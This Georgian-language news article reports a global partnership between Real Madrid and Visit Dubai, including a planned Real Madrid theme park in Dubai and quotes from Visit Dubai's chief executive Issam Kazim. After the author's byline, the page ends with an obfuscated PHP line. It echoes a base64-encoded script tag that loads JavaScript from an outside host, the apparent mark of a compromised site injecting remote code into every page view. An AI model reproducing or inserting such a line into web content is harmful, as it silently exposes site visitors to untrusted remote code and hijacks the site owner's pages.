celsiusi
ავერსი საქკაბელი

მადრიდის რეალი და Visit Dubai გლობალური პარტნიორობის შესახებ განცხადებას ავრცელებენ, - ამის შესახებ საინფორმაციო სააგენტო "ბიზნესთაიმს" დუბაისეკონომიკისადატურიზმის დეპარტამენტიდან აცნობეს.

მათივე ცნობით, საჯარო-კერძო სექტორების ძლიერი პარტნიორობა დუბაის წარმატების საფუძველია, ეს ახალი კოლაბორაცია მრავალწლიან პარტნიორობაზეა დაფუძნებული, რომელიც კოპმანია Emirates-მა ჯერ კიდევ 2011 წლიდან განამტკიცა. ეს პარტნიორობა ასევე იდეალურად იქნება შერწყმული სამომავლოდ დუბაიში მდებარე მადრიდის რეალის თემატურ პარკთან, რომელიც, როგორც Dubai Parks and Resorts-ის ნაწილი, ახლო აღმოსავლეთში ყველაზე დიდი თემატური პარკი იქნება და ქალაქის მრავალფეროვან დანიშნულების ადგილად პოზიციონირებას კიდევ უფრო შეუწყობს ხელს. პარკი მსოფლიოში პირველი იქნება, მადრიდის რეალთან დაკავშირებული სხვადასხვა ატრაქციონით, მუზეუმით, გასართობით, ფეხბურთის თამაშებით, საკვებისა და სასმელების მაღაზიებით და საცალო ვაჭრობის ადგილებით, სადაც მადრიდის რეალის ოფიციალური პროდუქტები, კლუბის დიდებულ ისტორიაზე სამახსოვრო ნივთები და სუვენირები გაიყიდება.
 
„მოხარული ვართ ახალი მოგზაურობა დავიწყოთ ჩვენს გლობალურ პარტნიორთან რეალ მადრიდთან ერთად. მსოფლიოს უდიდეს კლუბთან თანამშრომლობა ჩვენს საერთო ხედვასა და ღირებულებებზეა დაშენებული, რომლის თანახმად, თითოეული მიღწევა ახალი სიმაღლეების მიღწევის მოტივაციას ქმნის. ჩვენი მიზანია, მსოფლიოს უმსხვილეს ქალაქებს შორის გავამყაროთ დუბაის პოზიცია, ყველაზე ცნობილ კლუბთან ამ სტრატეგიული ალიანსით კი დუბაი კიდევ ერთხელ დაამტკიცებს, რომ იგი საუკეთესო ქალაქია საცხოვრებლად, სამუშაოდ თუ დასასვენებლად“, - განაცხადა დუბაის ტურიზმისა და კომერციული მარკეტინგის კორპორაციის (Visit Dubai) აღმასრულებელმა დირექტორმა ისამ ქაზიმმა.
 
ისამ ქაზიმის განმარტებით, „სრულყოფილების, ლიდერობის, ნიჭისა და ინოვაციებისადმი ჩვენი ორმხრივი ერთგულებით მოუთმენლად ველით ერთობლივ წარმატებებს, რათა მსოფლიოს ვაჩვენოთ დუბაისა და კლუბ მადრიდის რეალის გამარჯვების სულისკვეთება“.
 

ბრენდის ვიდეო:

ავტორი
მირანდა შურღაია
526
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");